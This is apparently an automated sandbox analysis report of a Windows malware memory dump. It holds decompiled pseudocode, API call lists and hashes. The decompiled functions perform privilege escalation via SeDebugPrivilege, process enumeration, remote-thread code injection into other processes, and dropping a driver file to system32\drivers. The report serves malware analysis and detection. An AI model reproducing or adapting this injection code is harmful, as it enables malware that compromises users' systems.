                                0x0220ed5c
                                0x0220ed5c
                                0x0220ed60
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0220ed62
                                0x0220ed5a
                                0x0220ecc2
                                0x0220ecc4
                                0x00000000
                                0x00000000
                                0x0220ecc9
                                0x0220eccf
                                0x0220ecd1
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0220ecd1
                                0x0220ec91
                                0x0220ec95
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0220ec95
                                0x0220eb6f
                                0x0220eb76
                                0x0220eb8f
                                0x0220eba0
                                0x00000000
                                0x0220e7e6
                                0x0220e7e6
                                0x022108d8
                                0x022108d8
                                0x022108dc
                                0x022108e2
                                0x022108e8
                                0x022108e8
                                0x022108f4
                                0x02210906
                                0x02210908
                                0x0221090f
                                0x0221090f
                                0x0221091b
                                0x0221091b
                                0x00000000
                                0x0221091b
                                0x0220e7e4
                                0x0220e733
                                0x0220e742
                                0x0220e748
                                0x0220e74a
                                0x00000000
                                0x0220e74c
                                0x0220e74c
                                0x00000000
                                0x0220e74c
                                0x0220e6b0
                                0x0220e6b0
                                0x0220e6cb
                                0x0220e6cb
                                0x0220e6db
                                0x0220e6dd
                                0x00000000
                                0x00000000
                                0x0220e6f1
                                0x0220e6f6
                                0x0220e6f9
                                0x0220e6fb
                                0x0220e6c2
                                0x0220e6c2
                                0x0220e6c5
                                0x00000000
                                0x0220e6fd
                                0x0220e703
                                0x0220e70b
                                0x00000000
                                0x0220e70b
                                0x0220e6fb
                                0x00000000
                                0x0220e6cb
                                0x0220e6a3
                                0x0220e6a3
                                0x02210920
                                0x02210923
                                0x02210930
                                0x02210930

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: ExchangeInterlocked
                                • String ID: .adata$2$CreateFileA$CreateFileW$GetProcAddress$M$$OpenFile$PE$_lopen$d$d$d
                                • API String ID: 367298776-1942104897
                                • Opcode ID: 22f754fceda2eba18b7ab32717bdde9b00812d568d5c429a1dec926ce990722f
                                • Instruction ID: f1d5ec052b43ded5b4e383ed53c9d5144d15280398d6f311638667576291276d
                                • Opcode Fuzzy Hash: 22f754fceda2eba18b7ab32717bdde9b00812d568d5c429a1dec926ce990722f
                                • Instruction Fuzzy Hash: 773347B1D11219DBDB24CF94CD84BE9B3B6BF88304F1881E9E50AAB285D7359AC5CF44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			E02211EF6(void* __ecx, void* __eflags, long _a4, CHAR* _a8) {
                                				long _v8;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				union _TOKEN_INFORMATION_CLASS _v32;
                                				long _v36;
                                				char _v4085;
                                				void _v4131;
                                				void _v4132;
                                				long _v4136;
                                				void** _v4140;
                                				void* _v4144;
                                				void _v4403;
                                				char _v4404;
                                				long _v4408;
                                				long _v4412;
                                				long _v4416;
                                				union _SID_NAME_USE _v4420;
                                				void _v4679;
                                				char _v4680;
                                				void* _v4684;
                                				void* _v4688;
                                				struct _TOKEN_PRIVILEGES _v4704;
                                				struct _OSVERSIONINFOA _v4852;
                                				long _v4856;
                                				intOrPtr _v4860;
                                				struct _TOKEN_PRIVILEGES _v4872;
                                				void* _v4876;
                                				int _t140;
                                				int _t145;
                                				int _t149;
                                				void* _t162;
                                				int _t173;
                                				int _t184;
                                				intOrPtr _t259;
                                				intOrPtr _t260;
                                				void* _t263;
                                
                                				_push(0xffffffff);
                                				_push(0x2204018);
                                				_push(0x2218090);
                                				 *[fs:0x0] = _t259;
                                				_t260 = _t259 - 8;
                                				E02218060(0x12f0, __ecx,  *[fs:0x0]);
                                				_v28 = _t260;
                                				_v36 = 0;
                                				_v4136 = 0;
                                				_v32 = 0;
                                				_v4416 = 0;
                                				_v4144 = 0;
                                				_v4412 = 0;
                                				_v4684 = 0;
                                				_v4132 = 0;
                                				memset( &_v4131, 0, 0x3ff << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v4688 = 0;
                                				_v4140 = 0;
                                				_v4408 = 0;
                                				_v4404 = 0;
                                				memset( &_v4403, 0, 0x40 << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v4680 = 0;
                                				memset( &_v4679, 0, 0x40 << 2);
                                				_t263 = _t260 + 0x24;
                                				asm("stosw");
                                				asm("stosb");
                                				_v8 = 0;
                                				_v4144 = OpenProcess(0x1f0fff, 0, _a4);
                                				if(_v4144 != 0) {
                                					L17:
                                					if(OpenProcessToken(_v4144, 8,  &_v4688) != 0) {
                                						_t140 = GetTokenInformation(_v4688, 1, 0, 0,  &_v4408); // executed
                                						if(_t140 == 0) {
                                							if(GetLastError() == 0x7a) {
                                								_v4140 = RtlAllocateHeap(GetProcessHeap(), 0, _v4408);
                                								if(_v4140 != 0) {
                                									_t145 = GetTokenInformation(_v4688, 1, _v4140, _v4408,  &_v4408); // executed
                                									if(_t145 != 0) {
                                										_v4136 = 0x50;
                                										_v36 = _v4136;
                                										_t149 = LookupAccountSidA(0,  *_v4140,  &_v4404,  &_v36,  &_v4680,  &_v4136,  &_v4420); // executed
                                										if(_t149 != 0) {
                                											if(_v4404 == 0) {
                                												_v8 = 0xffffffff;
                                											} else {
                                												_push("system");
                                												_push( &_v4404);
                                												if( *0x21e10b0() == 0) {
                                													L33:
                                													CreateMutexA(0, 0, _a8); // executed
                                													_v8 = 0xffffffff;
                                												} else {
                                													_push("local service");
                                													_push( &_v4404);
                                													if( *0x21e10b0() == 0) {
                                														goto L33;
                                													} else {
                                														_push("network service");
                                														_push( &_v4404);
                                														if( *0x21e10b0() != 0) {
                                															_t162 = VirtualAllocEx(_v4144, 0, 0x2000, 0x3000, 0x40); // executed
                                															_v4684 = _t162;
                                															if(_v4684 == 0) {
                                																L42:
                                																_v4684 = VirtualAllocEx(_v4144, 0, 0x1000, 0x3000, 0x40);
                                																if(_v4684 == 0) {
                                																	L48:
                                																	_v8 = 0xffffffff;
                                																} else {
                                																	E0221772B( &_v4132, 0x2290760, 0x30);
                                																	E0221772B( &_v4085, _a8,  *0x21e114c(_a8));
                                																	if(WriteProcessMemory(_v4144, _v4684,  &_v4132, 0x1000,  &_v36) != 0) {
                                																		if(CreateRemoteThread(_v4144, 0, 0, _v4684, 0, 0, 0) != 0) {
                                																			_v32 = 1;
                                																			goto L48;
                                																		} else {
                                																			_v8 = 0xffffffff;
                                																		}
                                																	} else {
                                																		_v8 = 0xffffffff;
                                																	}
                                																}
                                															} else {
                                																_t173 = WriteProcessMemory(_v4144, _v4684, E0228D760, 0x2000,  &_v36); // executed
                                																if(_t173 != 0) {
                                																	if(CreateRemoteThread(_v4144, 0, 0, _v4684, 0, 0, 0) != 0) {
                                																		_v32 = 1;
                                																		goto L42;
                                																	} else {
                                																		_v8 = 0xffffffff;
                                																	}
                                																} else {
                                																	_v8 = 0xffffffff;
                                																}
                                															}
                                														} else {
                                															goto L33;
                                														}
                                													}
                                												}
                                											}
                                										} else {
                                											_v8 = 0xffffffff;
                                										}
                                									} else {
                                										_v8 = 0xffffffff;
                                									}
                                								} else {
                                									_v8 = 0xffffffff;
                                								}
                                							} else {
                                								_v8 = 0xffffffff;
                                							}
                                						} else {
                                							_v8 = 0xffffffff;
                                						}
                                					} else {
                                						_v8 = 0xffffffff;
                                					}
                                				} else {
                                					if(GetLastError() != 5) {
                                						_v8 = 0xffffffff;
                                					} else {
                                						_v4852.dwOSVersionInfoSize = 0;
                                						memset( &(_v4852.dwMajorVersion), 0, 0x24 << 2);
                                						_t263 = _t263 + 0xc;
                                						_v4852.dwOSVersionInfoSize = 0x94;
                                						GetVersionExA( &_v4852);
                                						if(_v4852.dwPlatformId == 2) {
                                							_v4856 = 0x10;
                                							if(OpenThreadToken(GetCurrentThread(), 0x28, 0,  &_v4876) != 0) {
                                								L9:
                                								_v4872.PrivilegeCount = 1;
                                								_v4860 = 2;
                                								LookupPrivilegeValueA(0, "SeDebugPrivilege",  &(_v4872.Privileges)); // executed
                                								_t184 = AdjustTokenPrivileges(_v4876, 0,  &_v4872, 0x10,  &_v4704,  &_v4856); // executed
                                								if(_t184 != 0) {
                                									if(GetLastError() != 0x514) {
                                										_v4144 = OpenProcess(0x1f0fff, 0, _a4);
                                										AdjustTokenPrivileges(_v4876, 0,  &_v4704, 0x10, 0, 0); // executed
                                										FindCloseChangeNotification(_v4876); // executed
                                										if(_v4144 != 0) {
                                											goto L17;
                                										} else {
                                											_v8 = 0xffffffff;
                                										}
                                									} else {
                                										CloseHandle(_v4876);
                                										_v8 = 0xffffffff;
                                									}
                                								} else {
                                									CloseHandle(_v4876);
                                									_v8 = 0xffffffff;
                                								}
                                							} else {
                                								if(GetLastError() == 0x3f0) {
                                									if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v4876) != 0) {
                                										goto L9;
                                									} else {
                                										_v8 = 0xffffffff;
                                									}
                                								} else {
                                									_v8 = 0xffffffff;
                                								}
                                							}
                                						} else {
                                							_v8 = 0xffffffff;
                                						}
                                					}
                                				}
                                				if(_v4144 != 0) {
                                					FindCloseChangeNotification(_v4144); // executed
                                					_v4144 = 0;
                                				}
                                				if(_v4688 != 0) {
                                					CloseHandle(_v4688);
                                				}
                                				if(_v4140 != 0) {
                                					HeapFree(GetProcessHeap(), 0, _v4140);
                                				}
                                				 *[fs:0x0] = _v20;
                                				return _v32;
                                			}







































                                0x02211ef9
                                0x02211efb
                                0x02211f00
                                0x02211f0c
                                0x02211f13
                                0x02211f1b
                                0x02211f23
                                0x02211f26
                                0x02211f2d
                                0x02211f37
                                0x02211f3e
                                0x02211f48
                                0x02211f52
                                0x02211f5c
                                0x02211f66
                                0x02211f7a
                                0x02211f7c
                                0x02211f7e
                                0x02211f7f
                                0x02211f89
                                0x02211f93
                                0x02211f9d
                                0x02211fb1
                                0x02211fb3
                                0x02211fb5
                                0x02211fb6
                                0x02211fca
                                0x02211fca
                                0x02211fcc
                                0x02211fce
                                0x02211fcf
                                0x02211fe7
                                0x02211ff4
                                0x022121a7
                                0x022121bf
                                0x022121e1
                                0x022121e9
                                0x02212200
                                0x02212224
                                0x02212231
                                0x0221225d
                                0x02212265
                                0x02212273
                                0x02212283
                                0x022122b1
                                0x022122b9
                                0x022122d0
                                0x02212330
                                0x022122d2
                                0x022122d2
                                0x022122dd
                                0x022122e6
                                0x02212314
                                0x0221231c
                                0x02212322
                                0x022122e8
                                0x022122e8
                                0x022122f3
                                0x022122fc
                                0x00000000
                                0x022122fe
                                0x022122fe
                                0x02212309
                                0x02212312
                                0x02212351
                                0x02212357
                                0x02212364
                                0x022123cd
                                0x022123e8
                                0x022123f5
                                0x02212492
                                0x02212492
                                0x022123fb
                                0x02212409
                                0x02212427
                                0x02212455
                                0x02212480
                                0x0221248b
                                0x00000000
                                0x02212482
                                0x02212482
                                0x02212482
                                0x02212457
                                0x02212457
                                0x02212457
                                0x02212455
                                0x02212366
                                0x02212382
                                0x0221238a
                                0x022123b8
                                0x022123c6
                                0x00000000
                                0x022123ba
                                0x022123ba
                                0x022123ba
                                0x0221238c
                                0x0221238c
                                0x0221238c
                                0x0221238a
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02212312
                                0x022122fc
                                0x022122e6
                                0x022122bb
                                0x022122bb
                                0x022122bb
                                0x02212267
                                0x02212267
                                0x02212267
                                0x02212233
                                0x02212233
                                0x02212233
                                0x02212202
                                0x02212202
                                0x02212202
                                0x022121eb
                                0x022121eb
                                0x022121eb
                                0x022121c1
                                0x022121c1
                                0x022121c1
                                0x02211ffa
                                0x02212003
                                0x0221219b
                                0x02212009
                                0x02212009
                                0x02212020
                                0x02212020
                                0x02212022
                                0x02212033
                                0x02212040
                                0x0221204e
                                0x02212072
                                0x022120b3
                                0x022120b3
                                0x022120bd
                                0x022120d5
                                0x022120fb
                                0x02212103
                                0x02212129
                                0x02212155
                                0x02212171
                                0x0221217e
                                0x0221218b
                                0x00000000
                                0x0221218d
                                0x0221218d
                                0x0221218d
                                0x0221212b
                                0x02212132
                                0x02212138
                                0x02212138
                                0x02212105
                                0x0221210c
                                0x02212112
                                0x02212112
                                0x02212074
                                0x0221207f
                                0x022120a5
                                0x00000000
                                0x022120a7
                                0x022120a7
                                0x022120a7
                                0x02212081
                                0x02212081
                                0x02212081
                                0x0221207f
                                0x02212042
                                0x02212042
                                0x02212042
                                0x02212040
                                0x02212003
                                0x022124b2
                                0x022124bb
                                0x022124c1
                                0x022124c1
                                0x022124d2
                                0x022124db
                                0x022124db
                                0x022124e8
                                0x022124fa
                                0x022124fa
                                0x02212506
                                0x02212513

                                APIs
                                • OpenProcess.KERNEL32(001F0FFF,00000000,0000000A), ref: 02211FE1
                                • GetLastError.KERNEL32 ref: 02211FFA
                                • GetVersionExA.KERNEL32(00000094), ref: 02212033
                                • GetCurrentThread.KERNEL32 ref: 02212063
                                • OpenThreadToken.ADVAPI32(00000000), ref: 0221206A
                                • GetLastError.KERNEL32 ref: 02212074
                                • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 022121B7
                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 022124BB
                                • CloseHandle.KERNEL32(?), ref: 022124DB
                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 022124F3
                                • HeapFree.KERNEL32(00000000), ref: 022124FA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: OpenProcess$CloseErrorHeapLastThreadToken$ChangeCurrentFindFreeHandleNotificationVersion
                                • String ID: P$SeDebugPrivilege$local service$network service$system
                                • API String ID: 134594290-3830299594
                                • Opcode ID: 53c0a633b219dc636217ee81a02094d8147539a663814d4d463cdc8d5aa39b79
                                • Instruction ID: 33a36f519303e117abd597836126be4416f1f157b1382902f38a23ca1ef0e1c3
                                • Opcode Fuzzy Hash: 53c0a633b219dc636217ee81a02094d8147539a663814d4d463cdc8d5aa39b79
                                • Instruction Fuzzy Hash: 1BF14B74E50269EBEB20CBE0CC49FEE77B4AB58710F104698F61AAA1C4D7B45AC4CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 48%
                                			E02212514() {
                                				void _v263;
                                				char _v264;
                                				long _v268;
                                				void* _v272;
                                				char _v532;
                                				intOrPtr _v560;
                                				void _v564;
                                				void* _v568;
                                				void* _v572;
                                				void* _v576;
                                				void* _t55;
                                				int _t60;
                                				int _t61;
                                				void* _t71;
                                				void* _t124;
                                				void* _t125;
                                				void* _t126;
                                				void* _t127;
                                
                                				_v268 = 0;
                                				_v264 = 0;
                                				memset( &_v263, 0, 0x40 << 2);
                                				_t126 = _t125 + 0xc;
                                				asm("stosw");
                                				asm("stosb");
                                				_t55 = CreateToolhelp32Snapshot(2, 0); // executed
                                				_v272 = _t55;
                                				if(_v272 == 0) {
                                					L16:
                                					return CloseHandle(_v272);
                                				}
                                				_v568 = 0x128;
                                				memset( &_v564, 0, 0x49 << 2);
                                				_t127 = _t126 + 0xc;
                                				_t60 = Process32First(_v272,  &_v568); // executed
                                				if(_t60 != 0 && _v560 > 0xa) {
                                					_push( &_v532);
                                					if( *0x21e114c() <= 0x40) {
                                						 *0x21e1148( &_v264,  &_v532);
                                					} else {
                                						 *0x21e1064( &_v264,  &_v532, 0x40);
                                					}
                                					CharLowerA( &_v264);
                                					wsprintfA(_t124 +  *0x21e114c( &_v264, "M_%d_", _v560) - 0x104);
                                					_t127 = _t127 + 0xc;
                                					_v572 = CreateMutexA(0, 0,  &_v264);
                                					_v268 = GetLastError();
                                					ReleaseMutex(_v572);
                                					_t107 = _v572;
                                					CloseHandle(_v572);
                                					_t132 = _v268;
                                					if(_v268 == 0) {
                                						E02211EF6(_t107, _t132, _v560,  &_v264);
                                						_t127 = _t127 + 8;
                                					}
                                				}
                                				while(1) {
                                					_t61 = Process32Next(_v272,  &_v568); // executed
                                					if(_t61 == 0) {
                                						goto L16;
                                					}
                                					if(_v560 > 0xa) {
                                						_push( &_v532);
                                						if( *0x21e114c() <= 0x40) {
                                							 *0x21e1148( &_v264,  &_v532);
                                						} else {
                                							 *0x21e1064( &_v264,  &_v532, 0x40);
                                						}
                                						CharLowerA( &_v264); // executed
                                						wsprintfA(_t124 +  *0x21e114c( &_v264, "M_%d_", _v560) - 0x104);
                                						_t127 = _t127 + 0xc;
                                						_t71 = CreateMutexA(0, 0,  &_v264); // executed
                                						_v576 = _t71;
                                						_v268 = GetLastError();
                                						ReleaseMutex(_v576);
                                						FindCloseChangeNotification(_v576); // executed
                                						_t136 = _v268;
                                						if(_v268 == 0) {
                                							E02211EF6(_v560, _t136, _v560,  &_v264); // executed
                                							_t127 = _t127 + 8;
                                						}
                                					}
                                				}
                                				goto L16;
                                			}





















                                0x0221251e
                                0x02212528
                                0x0221253c
                                0x0221253c
                                0x0221253e
                                0x02212540
                                0x02212545
                                0x0221254a
                                0x02212557
                                0x0221276d
                                0x0221277e
                                0x0221277e
                                0x0221255d
                                0x02212574
                                0x02212574
                                0x02212584
                                0x0221258b
                                0x022125a4
                                0x022125ae
                                0x022125d6
                                0x022125b0
                                0x022125c0
                                0x022125c0
                                0x022125e3
                                0x0221260a
                                0x02212610
                                0x02212624
                                0x02212630
                                0x0221263d
                                0x02212643
                                0x0221264a
                                0x02212650
                                0x02212657
                                0x02212667
                                0x0221266c
                                0x0221266c
                                0x02212657
                                0x0221266f
                                0x0221267d
                                0x02212684
                                0x00000000
                                0x00000000
                                0x02212691
                                0x0221269d
                                0x022126a7
                                0x022126cf
                                0x022126a9
                                0x022126b9
                                0x022126b9
                                0x022126dc
                                0x02212703
                                0x02212709
                                0x02212717
                                0x0221271d
                                0x02212729
                                0x02212736
                                0x02212743
                                0x02212749
                                0x02212750
                                0x02212760
                                0x02212765
                                0x02212765
                                0x02212750
                                0x02212768
                                0x00000000

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02212545
                                • Process32First.KERNEL32(00000000,00000128), ref: 02212584
                                • lstrlen.KERNEL32(?), ref: 022125A5
                                • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 022125C0
                                • lstrcpy.KERNEL32(00000000,?), ref: 022125D6
                                • CharLowerA.USER32(00000000), ref: 022125E3
                                • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 022125FC
                                • wsprintfA.USER32 ref: 0221260A
                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0221261E
                                • GetLastError.KERNEL32 ref: 0221262A
                                • ReleaseMutex.KERNEL32(?), ref: 0221263D
                                • CloseHandle.KERNEL32(?), ref: 0221264A
                                • Process32Next.KERNEL32(00000000,00000128), ref: 0221267D
                                • lstrlen.KERNEL32(?,00000000,00000128), ref: 0221269E
                                • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 022126B9
                                • lstrcpy.KERNEL32(00000000,?), ref: 022126CF
                                • CharLowerA.USER32(00000000), ref: 022126DC
                                • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 022126F5
                                • wsprintfA.USER32 ref: 02212703
                                • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 02212717
                                • GetLastError.KERNEL32 ref: 02212723
                                • ReleaseMutex.KERNEL32(?), ref: 02212736
                                • FindCloseChangeNotification.KERNELBASE(?), ref: 02212743
                                • CloseHandle.KERNEL32(00000000), ref: 02212774
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Mutexlstrlen$CloseCreate$CharErrorHandleLastLowerProcess32Releaselstrcpylstrcpynwsprintf$ChangeFindFirstNextNotificationSnapshotToolhelp32
                                • String ID: M_%d_$M_%d_
                                • API String ID: 3644635855-485321427
                                • Opcode ID: 7d6c0a636313161d064d1391015af4f9280e8d710a55961b482de85b8044b4bb
                                • Instruction ID: bfe7f242bbbe5f6a9aa2b38a58a1036f13b1cf175a11e7beb60da0ab5f45ace8
                                • Opcode Fuzzy Hash: 7d6c0a636313161d064d1391015af4f9280e8d710a55961b482de85b8044b4bb
                                • Instruction Fuzzy Hash: 07513CB5C50228EBDF20DBE0DC88FDA77B9AB68301F1049D9E649A6144DBB49ED4CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 022044CB: InterlockedExchange.KERNEL32(022190C0,0220A192), ref: 022044E9
                                • Sleep.KERNELBASE ref: 0220A374
                                • GetTempPathA.KERNEL32(00000100,00000000), ref: 0220A386
                                • lstrlen.KERNEL32(00000000), ref: 0220A393
                                • lstrcat.KERNEL32(00000000,02203CAC), ref: 0220A3B2
                                • lstrlen.KERNEL32(00000000), ref: 0220A3CC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0220A3E6
                                • lstrcat.KERNEL32(00000000,02203CB0), ref: 0220A3F8
                                • FindFirstFileA.KERNELBASE(00000000,00000000), ref: 0220A422
                                • FindNextFileA.KERNELBASE(000000FF,00000000), ref: 0220A449
                                • lstrcat.KERNEL32(00000000,?), ref: 0220A473
                                • lstrlen.KERNEL32(00000000), ref: 0220A480
                                • lstrlen.KERNEL32(?), ref: 0220A493
                                • lstrcmpi.KERNEL32(00000000,022026F0), ref: 0220A4AF
                                • lstrcmpi.KERNEL32(00000000,_Rar), ref: 0220A4F3
                                • Sleep.KERNELBASE(00000100), ref: 0220A511
                                • FindClose.KERNEL32(00000000), ref: 0220A52C
                                • Sleep.KERNEL32(000927C0), ref: 0220A537
                                • RtlExitUserThread.NTDLL(00000000), ref: 0220A544
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrlen$FindSleeplstrcat$Filelstrcmpi$CloseExchangeExitFirstInterlockedNextPathTempThreadUserlstrcpy
                                • String ID: _Rar
                                • API String ID: 932915221-536834240
                                • Opcode ID: 9cc9d9ee0e1a8c826d479f2eecdd60ddae73ac5a8601afbc9e46c681bea0b47e
                                • Instruction ID: 0639120da6fa010395ab97e92adc86367bd542c1847c305d83c76675ca59ede9
                                • Opcode Fuzzy Hash: 9cc9d9ee0e1a8c826d479f2eecdd60ddae73ac5a8601afbc9e46c681bea0b47e
                                • Instruction Fuzzy Hash: 39517D71D50218EBDB60DBE4DC88BEF77B9AB44705F4049A8E60EAA184DB749BC4CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 98%
                                			E02209EEA() {
                                				struct HINSTANCE__* _v8;
                                				long _v12;
                                				struct HINSTANCE__* _v16;
                                				intOrPtr _t18;
                                				CHAR* _t24;
                                				CHAR* _t29;
                                				CHAR* _t34;
                                				CHAR* _t42;
                                				intOrPtr _t50;
                                				intOrPtr _t52;
                                				CHAR* _t54;
                                				CHAR* _t56;
                                				CHAR* _t61;
                                				CHAR* _t62;
                                				CHAR* _t64;
                                				CHAR* _t66;
                                				CHAR* _t67;
                                				intOrPtr _t68;
                                				void* _t69;
                                				void* _t71;
                                				void* _t72;
                                
                                				if( *0x22194d4 == 0) {
                                					Sleep(0x1000);
                                				} else {
                                					Sleep(0x1d4c0); // executed
                                				}
                                				_v8 = 0;
                                				_v16 = 0;
                                				_t18 =  *0x21e1c08; // 0x2202e8c
                                				E02208F51(_t18, 0x80000001); // executed
                                				_t52 =  *0x21e1c08; // 0x2202e8c
                                				E02208F51(_t52, 0x80000002); // executed
                                				_t71 = _t69 + 0x10;
                                				_t61 =  *0x21e1870; // 0x22027c0
                                				_v8 = LoadLibraryA(_t61);
                                				if(_v8 == 0) {
                                					L27:
                                					_push(0);
                                					RtlExitUserThread();
                                					return 0;
                                				} else {
                                					_t24 =  *0x21e1878; // 0x22027d0
                                					 *0x22190ac = GetProcAddress(_v8, _t24);
                                					if( *0x22190ac != 0) {
                                						_t62 =  *0x21e187c; // 0x22027e0
                                						 *0x22190a0 = GetProcAddress(_v8, _t62);
                                						if( *0x22190a0 != 0) {
                                							_t54 =  *0x21e1880; // 0x22027f0
                                							 *0x22190b4 = GetProcAddress(_v8, _t54);
                                							if( *0x22190b4 != 0) {
                                								_t29 =  *0x21e1884; // 0x2202800
                                								 *0x2219098 = GetProcAddress(_v8, _t29);
                                								if( *0x2219098 != 0) {
                                									_t64 =  *0x21e188c; // 0x2202814
                                									 *0x2219048 = GetProcAddress(_v8, _t64);
                                									if( *0x2219048 != 0) {
                                										_t56 =  *0x21e1890; // 0x2202824
                                										 *0x221906c = GetProcAddress(_v8, _t56);
                                										if( *0x221906c != 0) {
                                											_t34 =  *0x21e1898; // 0x2202838
                                											 *0x22190b8 = GetProcAddress(_v8, _t34);
                                											if( *0x22190b8 != 0) {
                                												_t66 =  *0x21e18b0; // 0x2202868
                                												 *0x221909c = GetProcAddress(_v8, _t66);
                                												if( *0x221909c != 0) {
                                													E022092F3();
                                													E022041C6( &_v12, CreateThread(0, 0, E0220940A, 0, 0,  &_v12), 0, 0);
                                													_t72 = _t71 + 0xc;
                                													_t67 =  *0x21e1824; // 0x220272c
                                													_v16 = LoadLibraryA(_t67);
                                													if(_v16 == 0) {
                                														goto L27;
                                													}
                                													_t42 =  *0x21e1698; // 0x2202158
                                													 *0x221900c = GetProcAddress(_v16, _t42);
                                													if( *0x221900c == 0) {
                                														goto L27;
                                													}
                                													if(E0220917D() == 0) {
                                														_t68 =  *0x21e167c; // 0x2200cc4
                                														E022045D2("C:\\Windows\\system32\\drivers\\rmhlrn.sys", _t68, 0x1425);
                                														_t50 =  *0x21e16b0; // 0x2202260
                                														E02209243(_t50, "C:\\Windows\\system32\\drivers\\rmhlrn.sys");
                                														_t72 = _t72 + 0x14;
                                													}
                                													if(E0220917D() != 0 && E02209706() != 0) {
                                														E022041C6( &_v12, CreateThread(0, 0, E02209EBE, 0, 0,  &_v12), 0, 0);
                                													}
                                													goto L27;
                                												}
                                												goto L27;
                                											}
                                											goto L27;
                                										}
                                										goto L27;
                                									}
                                									goto L27;
                                								}
                                								goto L27;
                                							}
                                							goto L27;
                                						}
                                						goto L27;
                                					}
                                					goto L27;
                                				}
                                			}
























                                0x02209ef7
                                0x02209f0b
                                0x02209ef9
                                0x02209efe
                                0x02209efe
                                0x02209f11
                                0x02209f18
                                0x02209f24
                                0x02209f2a
                                0x02209f37
                                0x02209f3e
                                0x02209f43
                                0x02209f46
                                0x02209f53
                                0x02209f5a
                                0x0220a149
                                0x0220a149
                                0x0220a14b
                                0x00000000
                                0x02209f60
                                0x02209f60
                                0x02209f70
                                0x02209f7c
                                0x02209f83
                                0x02209f94
                                0x02209fa0
                                0x02209fa7
                                0x02209fb8
                                0x02209fc4
                                0x02209fcb
                                0x02209fdb
                                0x02209fe7
                                0x02209fee
                                0x02209fff
                                0x0220a00b
                                0x0220a012
                                0x0220a023
                                0x0220a02f
                                0x0220a036
                                0x0220a046
                                0x0220a052
                                0x0220a059
                                0x0220a06a
                                0x0220a076
                                0x0220a07d
                                0x0220a09e
                                0x0220a0a3
                                0x0220a0a6
                                0x0220a0b3
                                0x0220a0ba
                                0x00000000
                                0x00000000
                                0x0220a0c0
                                0x0220a0d0
                                0x0220a0dc
                                0x00000000
                                0x00000000
                                0x0220a0e5
                                0x0220a0ec
                                0x0220a0f8
                                0x0220a105
                                0x0220a10b
                                0x0220a110
                                0x0220a110
                                0x0220a11a
                                0x0220a141
                                0x0220a146
                                0x00000000
                                0x0220a11a
                                0x00000000
                                0x0220a155
                                0x00000000
                                0x0220a157
                                0x00000000
                                0x0220a159
                                0x00000000
